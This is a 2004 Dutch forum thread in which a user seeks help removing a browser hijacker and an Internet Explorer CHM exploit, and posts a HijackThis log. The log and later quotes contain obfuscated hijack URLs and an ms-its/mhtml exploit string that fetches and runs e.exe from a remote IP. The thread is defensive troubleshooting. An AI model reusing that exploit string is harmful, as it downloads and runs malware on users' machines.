[NAV] kan bloodhound.exploit.6 niet verwijderen

Pagina: 1
Acties:

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
Ik heb 't bloodhound.exploit.6 virus binnen gekregen, en nu krijg ik telkens en popup (ook middenin een game) dat norton anti-virus m niet kan verwijderen.
Mijn i-net explorer is ook heel traag geworden en kan ik sommige sites niet openen (o.a. die waar ik removaltooltjes kan downloaden :() en hij gooit m'n openingspagina steds naar 1-of-andere niet bestaande site, en nu kan ik NAV nieteens meer gebruiken, deze geeft nl. de foutcode:

'g_NAVStatus' is niet gedefineerd :
res://C:\PROGRA~1\NORTON~1|NAVUI.dll/navstats.htm : 289

link naar site:
http://service1.symantec....1606?OpenDocument&src=_mi

302.0

ik heb nu al vanalles geprobeerd, maar krijg m niet weg, wie wet een workaround om NAV toch goed te kunnen instaleren ?

- heb al geprobeerd om NAV opnieuw te installen,
maar dan komt ie met dezelfde error message
- heb IE opniew ge-installed
- spybot geprobeerd
- adaware geprobeerd
- hijackthis geprobeerd

begin nu snel m'n "cool" te verliezen 8)7 :r

ride on


  • chromeeh
  • Registratie: Oktober 2001
  • Laatst online: 10:12

chromeeh

the Gnome

Maybe een gek voorstel, maar probeer eens NAV te de-installen, vervolgens RegSupreme te draaien (deze cleaned je register gigantisch op).
Daarna ff bij TrendMicro een online scan doen ;)
Aangezien deze net iets anders werkt dan NAV kun je geluk hebben en de trojan op deze manier kwijt raken :)
En daarna weer NAV installen ;)

"Some day, I hope to find the nuggets on a chicken."


  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
heeft iemand een goede link naar een goede online scanner, ik zoek me rot maar kan m niet vinden :(

ride on


  • elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

www.housecall.nl is een bekende online scanner - maar daar moet je toch al uitgekomen zijn met de link van crashoverride?

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
ik krijg niet-1 online scanner te pakken, ik kom dan nl. telkens op een porno site terecht of ik krijg de foutmelding dat er een fout is opgetreden in IE en dat die moet worden afgesloten,
zal wel weer op een format c: uitkomen :(

ride on


Verwijderd

Post je HijackThis log eens.. Download hier

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
Logfile of HijackThis v1.97.7
Scan saved at 17:48:39, on 5-4-2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\System32\ctfmon.exe
C:\PROGRA~1\INCRED~1\bin\IMApp.exe
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\PROGRA~1\NORTON~1\navw32.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\Mijn documenten\proggies\hijackthis\HijackThis.exe
C:\Program Files\Messenger\msmsgs.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com%00@www.e-finder.cc/hp/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com%00@www.e-finder.cc/hp/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://windowsupdate.microsoft.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,(Default) = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [Xerox WorkCentre 470cx Monitor] RUNDLL32.EXE C:\WINDOWS\System32\X470SHLL.DLL,AutoUpdatePnPValue
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [IncrediMail] C:\PROGRA~1\INCRED~1\bin\IncMail.exe /c
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: &Add animation to IncrediMail Style Box - C:\PROGRA~1\INCRED~1\bin\resources\WebMenuImg.htm
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O13 - DefaultPrefix: http://%65%68%74%74%70%2E%63%63/?
O13 - WWW Prefix: http://%65%68%74%74%70%2E%63%63/?
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedi...wave/cabs/director/sw.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.m...uctl.CAB?38052.2525694444
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedi...ve/cabs/flash/swflash.cab
O16 - DPF: {F00F4763-7355-4725-82F7-0DA94A256D46} (IMDownloader Class) - http://www2.incredimail.c...p/downloader/imloader.cab

ride on


  • Miki
  • Registratie: November 2001
  • Laatst online: 12:09
Panda online scanner is ook een zeer goede, in mijn ogen zelfs beter dan die van trend (housecall) vanwege de hogere update graad.

Link: Panda activescan

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
nofi,
maar als je goed had gelezen, had je gezien dat ik al heb ge-probeerd om een online scan te doen.
Ik heb alle scans die aangegeven staan op antivirus.pagina.nl staan ge-probeerd, maar geen van allen komen ze door (telkens een porn site of ongeldige pagina of een fout in IE oid).

ik ga m'n hdd wel formatteren, zal weinig anders opzitten denk ik, ben nu al meer als 5 uur bezig en had in die tijd al 3 keer xp opnieuw kunnen instaleren, dat ga ik dan ook maar doen denk ik (of iemand moet mij een-of-ander tooltje kunnen mailen)

ride on


  • BoGhi
  • Registratie: Juli 2002
  • Laatst online: 21-09 10:42
dikiedik schreef op 05 april 2004 @ 22:19:
Logfile of HijackThis v1.97.7
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com%00@www.e-finder.cc/hp/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com%00@www.e-finder.cc/hp/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,(Default) = http://homepage.com%00@www.e-finder.cc/search/ (obfuscated)

O13 - DefaultPrefix: http://%65%68%74%74%70%2E%63%63/?
O13 - WWW Prefix: http://%65%68%74%74%70%2E%63%63/?

O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
Mag ik ook een keertje :P Bovenstaande laten verwijderen (met HT), en je hebt weer controle over je browser (hoop ik voor je)

Edit: niet gelijk formatten, da's geen uitdaging

Programmers don't die. They GOSUB without RETURN


Verwijderd

O13 - DefaultPrefix: http://%65%68%74%74%70%2E%63%63/?
O13 - WWW Prefix: http://%65%68%74%74%70%2E%63%63/?
O16 - DPF: {11111111-1111-1111-1111-111111111123} -
Enhanced HTTP Protocol
Heb je dat bewust geïnstalleerd?
ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
Dat ziet er best vies uit eigenlijk, doet me denken aan de nieuwe IE exploit.
Helaas zijn de(interessante)files niet meer online.
Zou je eens kunnen zoeken naar rare chm files en een e.exe?
Als je wat verdacht vindt: submitten aub.(Zie sig voor mail)

  • Bor
  • Registratie: Februari 2001
  • Laatst online: 12:41

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Waarom krijg ik een popup van Symantec corporate tijdens het openen van dit topic dat ook bij mij bloodhound.exploit.6 is gevonden (alweer)?

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


Verwijderd

Bor_de_Wollef schreef op 05 april 2004 @ 23:45:
Waarom krijg ik een popup van Symantec corporate tijdens het openen van dit topic dat ook bij mij bloodhound.exploit.6 is gevonden (alweer)?
Kopieer mijn quote eens waar ik het heb over de nieuwe exploit.
Save naar txt file en scan die eens. :)

  • Bor
  • Registratie: Februari 2001
  • Laatst online: 12:41

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Gelijk een popup inderdaad. :(

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • Miki
  • Registratie: November 2001
  • Laatst online: 12:09
Hoe recent is dit virus als ik vragen mag?

Laat maar, februari 2004 B)

Hoe noemt KAV en Mcafee deze exploit eigenlijk?

[ Voor 59% gewijzigd door Miki op 06-04-2004 00:14 ]


  • Bor
  • Registratie: Februari 2001
  • Laatst online: 12:41

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Volgens mij detecteert Norton het virus niet eens als je de heuristics uitzet. Alles wat ie dan vind noemt ie bloodhound.iets namelijk. Bloodhound is de naam van de symantec heuristics scanner.

[ Voor 18% gewijzigd door Bor op 06-04-2004 00:17 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • Miki
  • Registratie: November 2001
  • Laatst online: 12:09
Okay, thx voor de info! Ik kon zo 123 niks vinden in de databases van de andere vendors.

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
believe you me dat IK al die ongein zeker niet bewust heb ge-installed,
het is nieteens mijn pc, maar die van m'n vader en m'n zusje.
vorige week hadden we nogal wat ellende met CHELLO, en toen moest ik van die eikel van de helpdesk m'n firewall en virusscanner de-installen,
(terwijl ik m al had verzekerd dat het daar niet aan kon liggen omdat ik er op MIJN pc met dezelfde versie geen last van heb).

sindsdien is er stront aan de speekwoordelijke knikker :r
ik houd altijd alles netjes up-to-date, 1 dag zonder en je ziet t maar weer |:(

ride on


  • WimB
  • Registratie: Juli 2001
  • Laatst online: 30-03-2024
Probeer eens een BartPE CD aan te maken. En vanaf die CD scannen met Ad-aware en met MCAfee (staan beide op die CD, je moet er alleen nog enkele extra files voor downloaden). Maak die CD wel aan vanuit een andere PC.

Verder moet je duidelijk nog een heleboel regels verwijderen met je HijackThis. Is dat al gebeurd?

  • dikiedik
  • Registratie: Maart 2002
  • Laatst online: 08-04 10:41

dikiedik

de verkeers ont regelaar

Topicstarter
hyjackthis is nu weer schoon, maar als ik reboot of IE opnieuw opstart dan staat er weer t een-en-ander, heb gezocht op e.exe en chm files, maar nix hoor :'( heb al een paar proggies eraf gegoooid die ik zwaar verdenkelijk vind (waaronder incredimail die m'n zusje er op gezet had )

ride on


  • WimB
  • Registratie: Juli 2001
  • Laatst online: 30-03-2024
Ik heb ook ooit zoiets voorgehad. Ik heb dit toen op kunnen lossen door te booten vanaf een CD en vervolgens de ganse PC te scannen met Ad-Aware (met laatste update) én met een up-to-date virusscanner.

Installeer anders eens de beta versie van Kaspersky. Deze is geldig tot midden mei als ik mij niet vergis.

Verwijderd

dikiedik schreef op 06 april 2004 @ 08:26:
believe you me dat IK al die ongein zeker niet bewust heb ge-installed,
het is nieteens mijn pc, maar die van m'n vader en m'n zusje.
vorige week hadden we nogal wat ellende met CHELLO, en toen moest ik van die eikel van de helpdesk m'n firewall en virusscanner de-installen,
(terwijl ik m al had verzekerd dat het daar niet aan kon liggen omdat ik er op MIJN pc met dezelfde versie geen last van heb).

sindsdien is er stront aan de speekwoordelijke knikker :r
ik houd altijd alles netjes up-to-date, 1 dag zonder en je ziet t maar weer |:(
die chm ellende kun je niks aan doen, behalve nooit meer internet explorer gebruiken.
die chm ellende (zie ook de thread over irc wormen e.d.) exploit is een nog steeds niet opgelost probleem in ie |:( (en dat isnog maar 1 van de 19 onopgeloste holes in de meest gebruikte browser ter wereld.

gebruikt wat anders: firefox/mozilla/opera/ect.

Succes.
Pagina: 1